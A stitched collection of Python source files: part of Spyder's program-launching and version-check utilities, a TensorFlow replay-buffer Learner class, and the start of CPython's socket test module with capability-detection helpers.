info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils import icon_manager as ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it is supporting
unicode strings (shlex does not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or python_exe contains spaces, it can't be ran on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name)
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
# Hacks needed so that LooseVersion understands that (for example)
# version = '3.0.0' is in fact bigger than actver = '3.0.0rc1'
if is_stable_version(version) and not is_stable_version(actver) and \
actver.startswith(version) and version != actver:
version = version + 'zz'
elif is_stable_version(actver) and not is_stable_version(version) and \
version.startswith(actver) and version != actver:
actver = actver + 'zz'
try:
if cmp_op == '>':
return LooseVersion(actver) > LooseVersion(version)
elif cmp_op == '>=':
return LooseVersion(actver) >= LooseVersion(version)
elif cmp_op == '=':
return LooseVersion(actver) == LooseVersion(version)
elif cmp_op == '<':
return LooseVersion(actver) < LooseVersion(version)
elif cmp_op == '<=':
return LooseVersion(actver) <= LooseVersion(version)
else:
return False
except TypeError:
return True
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, > or < to specify the exact requirement ;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try to not take a wrong decision if interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if it's __pycache__ main directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# At this point we can't have a text file
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
learner.py
|
from __future__ import division
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import traceback, threading, time, warnings
import tensorflow as tf
import numpy as np
import util
from replay import ReplayBuffer
class Learner(object):
"""
Generic object which runs the main training loop of anything that trains using
a replay buffer. Handles updating, logging, saving/loading, batching, etc.
"""
def __init__(self, interactor_queue, lock, config, env_config, learner_config, **bonus_kwargs):
self.learner_name = self.learner_name()
self.interactor_queue = interactor_queue
self.learner_lock = lock
self.config = config
self.env_config = env_config
self.learner_config = learner_config
self.bonus_kwargs = bonus_kwargs
self.kill_threads = False
self.permit_desync = False
self.need_frames_notification = threading.Condition()
self._reset_inspections()
self.total_frames = 0
np.random.seed(self.config["seed"])
tf.set_random_seed(self.config["seed"])
self.save_path = util.create_directory("%s/%s/%s/%s" % (self.config["output_root"], self.config["env"]["name"], self.config["name"], self.config["save_model_path"]))
self.log_path = util.create_directory("%s/%s/%s/%s" % (self.config["output_root"], self.config["env"]["name"], self.config["name"], self.config["log_path"])) + "/%s.log" % self.learner_name
# replay buffer to store data
self.replay_buffer_lock = threading.RLock()
self.replay_buffer = ReplayBuffer(self.learner_config["replay_size"],
np.prod(self.env_config["obs_dims"]),
self.env_config["action_dim"])
# data loaders pull data from the replay buffer and put it into the tfqueue for model usage
self.data_loaders = self.make_loader_placeholders()
queue_capacity = np.ceil(1./self.learner_config["frames_per_update"]) if self.learner_config["frames_per_update"] else 100
self.tf_queue = tf.FIFOQueue(capacity=queue_capacity, dtypes=[dl.dtype for dl in self.data_loaders])
self.enqueue_op = self.tf_queue.enqueue(self.data_loaders)
self.current_batch = self.tf_queue.dequeue()
# build the TF graph for the actual model to train
self.core, self.train_losses, self.train_ops, self.inspect_losses = self.make_core_model()
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
## Mandatory functions to override
def learner_name(self): raise Exception('unimplemented: learner_name')
def make_loader_placeholders(self): raise Exception('unimplemented: make_loader_placeholders')
def make_core_model(self): raise Exception('unimplemented: make_core_model')
## Optional functions to override
def initialize(self): warnings.warn('unimplemented: initialize')
def resume_from_checkpoint(self, epoch): warnings.warn('unimplemented: resume_from_checkpoint')
def checkpoint(self): warnings.warn('unimplemented: checkpoint')
def backup(self): warnings.warn('unimplemented: backup')
## Internal functions
def _start(self):
# fetch data from the interactors to pre-fill the replay buffer
self.prefetch_thread = threading.Thread(target=self._poll_interactors, args=(True, self.learner_config["frames_before_learning"],))
self.prefetch_thread.start()
self.prefetch_thread.join()
# start the interactor and data loader
self.data_load_thread = threading.Thread(target=self._run_enqueue_data)
self.data_load_thread.start()
# initialize the learner, pretraining if needed
if self.config["resume"]: self._resume_from_checkpoint()
else: self._initialize()
# re-sync everything, and start up interactions with the environment
self.interactor_poll_thread = threading.Thread(target=self._poll_interactors)
self.interactor_poll_thread.start()
# start the clock
self._last_checkpoint_time = time.time()
def _learn(self, permit_desync=False, log=True, checkpoint=True, backup=True):
# this is to keep the frames/update synced properly
if self.learner_config["frames_per_update"] is not False and not permit_desync:
if not self._have_enough_frames():
with self.need_frames_notification:
self.need_frames_notification.notify()
return
# log
if log and (self.update_i + 1) % self.learner_config["log_every_n"] == 0:
self._log()
# checkpoint
if checkpoint and (self.update_i + 1) % self.learner_config["epoch_every_n"] == 0:
self._checkpoint()
# backup
if backup and (self.update_i + 1) % self.learner_config["backup_every_n"] == 0:
self._backup()
# train
self._training_step()
def _have_enough_frames(self):
gathered_frames = self.total_frames - self.learner_config["frames_before_learning"]
return gathered_frames > self.learner_config["frames_per_update"] * self.update_i
def _initialize(self):
self.epoch = 0
self.update_i = 0
self.hours = 0
self._last_checkpoint_time = time.time()
self.initialize()
if self.learner_config["pretrain_n"]: self._pretrain()
self._checkpoint()
def _pretrain(self):
for _ in range(self.learner_config["pretrain_n"]):
self._learn(permit_desync=True, checkpoint=False, backup=False)
self.epoch = 0
self.update_i = 0
def _resume_from_checkpoint(self):
epoch = util.get_largest_epoch_in_dir(self.save_path, self.core.saveid)
if not self.config['keep_all_replay_buffers']: util.wipe_all_but_largest_epoch_in_dir(self.save_path, self.core.saveid)
if epoch is False:
raise Exception("Tried to reload but no model found")
with self.learner_lock:
self.core.load(self.sess, self.save_path, epoch)
self.epoch, self.update_i, self.total_frames, self.hours = self.sess.run([self.core.epoch_n, self.core.update_n, self.core.frame_n, self.core.hours])
with self.replay_buffer_lock:
self.replay_buffer.load(self.save_path, '%09d_%s' % (epoch, self.learner_name))
self.resume_from_checkpoint(epoch)
def _log(self):
if self.denom > 0:
logstring = "(%3.2f sec) h%-8.2f e%-8d s%-8d f%-8d\t" % (time.time() - self._log_time, self.hours, self.epoch, self.update_i + 1, self.total_frames) + ', '.join(["%8f" % x for x in (self.running_total / self.denom).tolist()])
print("%s\t%s" % (self.learner_name, logstring))
with open(self.log_path, "a") as f: f.write(logstring + "\n")
self._reset_inspections()
def _reset_inspections(self):
self.running_total = 0.
self.denom = 0.
self._log_time = time.time()
def _checkpoint(self):
self.checkpoint()
self.epoch += 1
self.hours += (time.time() - self._last_checkpoint_time) / 3600.
self._last_checkpoint_time = time.time()
self.core.update_epoch(self.sess, self.epoch, self.update_i, self.total_frames, self.hours)
with self.learner_lock: self.core.save(self.sess, self.save_path)
def _backup(self):
self.backup()
if not self.learner_config['keep_all_replay_buffers']: util.wipe_all_but_largest_epoch_in_dir(self.save_path, self.core.saveid)
with self.learner_lock:
self.core.save(self.sess, self.save_path, self.epoch)
with self.replay_buffer_lock:
self.replay_buffer.save(self.save_path, '%09d_%s' % (self.epoch, self.learner_name))
def _training_step(self):
train_ops = tuple([op for op, loss in zip(self.train_ops,
self.train_losses)
if loss is not None])
outs = self.sess.run(train_ops + self.inspect_losses)
self.running_total += np.array(outs[len(train_ops):])
self.denom += 1.
self.update_i += 1
def _poll_interactors(self, continuous_poll=False, frames_before_terminate=None):
# poll the interactors for new frames.
# the synced_condition semaphore prevents this from consuming too much CPU
while not self.kill_threads:
if self.learner_config["frames_per_update"] is not False and not continuous_poll:
with self.need_frames_notification: self.need_frames_notification.wait()
while not self.interactor_queue.empty():
new_frames = self.interactor_queue.get()
self._add_frames(new_frames)
if frames_before_terminate and self.total_frames >= frames_before_terminate: return
def _add_frames(self, frames):
with self.replay_buffer_lock:
for frame in frames:
self.replay_buffer.add_replay(*frame)
self.total_frames = self.replay_buffer.count
return self.total_frames
def _run_enqueue_data(self):
while not self.kill_threads:
data = self.replay_buffer.random_batch(self.learner_config["batch_size"])
self.sess.run(self.enqueue_op, feed_dict=dict(list(zip(self.data_loaders, data))))
def _kill_threads(self):
self.kill_threads = True
class CoreModel(object):
"""The base class for the "core" of learners."""
def __init__(self, name, env_config, learner_config):
self.name = self.saveid + "/" + name
self.env_config = env_config
self.learner_config = learner_config
with tf.variable_scope(self.name):
self.epoch_n = tf.get_variable('epoch_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.update_n = tf.get_variable('update_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.frame_n = tf.get_variable('frame_n', [], initializer=tf.constant_initializer(0), dtype=tf.int64, trainable=False)
self.hours = tf.get_variable('hours', [], initializer=tf.constant_initializer(0.), dtype=tf.float64, trainable=False)
self.epoch_n_placeholder = tf.placeholder(tf.int64, [])
self.update_n_placeholder = tf.placeholder(tf.int64, [])
self.frame_n_placeholder = tf.placeholder(tf.int64, [])
self.hours_placeholder = tf.placeholder(tf.float64, [])
self.assign_epoch_op = [tf.assign(self.epoch_n, self.epoch_n_placeholder), tf.assign(self.update_n, self.update_n_placeholder), tf.assign(self.frame_n, self.frame_n_placeholder), tf.assign(self.hours, self.hours_placeholder)]
self.create_params(env_config, learner_config)
self.model_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.saver = tf.train.Saver(self.model_params)
@property
def saveid(self):
raise Exception("specify a save ID")
def create_params(self, env_config, learner_config):
raise Exception("unimplemented")
def update_epoch(self, sess, epoch, updates, frames, hours):
sess.run(self.assign_epoch_op, feed_dict={self.epoch_n_placeholder: int(epoch), self.update_n_placeholder: int(updates), self.frame_n_placeholder: int(frames), self.hours_placeholder: float(hours)})
def save(self, sess, path, epoch=None):
if epoch is None: self.saver.save(sess, path + "/%s.params" % self.saveid)
else: self.saver.save(sess, path + "/%09d_%s.params" % (epoch, self.saveid))
def load(self, sess, path, epoch=None):
if epoch is None: self.saver.restore(sess, path + "/%s.params" % self.saveid)
else: self.saver.restore(sess, path + "/%09d_%s.params" % (epoch, self.saveid))
def run_learner(learner_subclass, queue, lock, config, env_config, learner_config, **bonus_kwargs):
learner = learner_subclass(queue, lock, config, env_config, learner_config, **bonus_kwargs)
try:
learner._start()
while True: learner._learn()
except Exception as e:
print('Caught exception in learner process')
traceback.print_exc()
learner._kill_threads()
print()
raise e
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
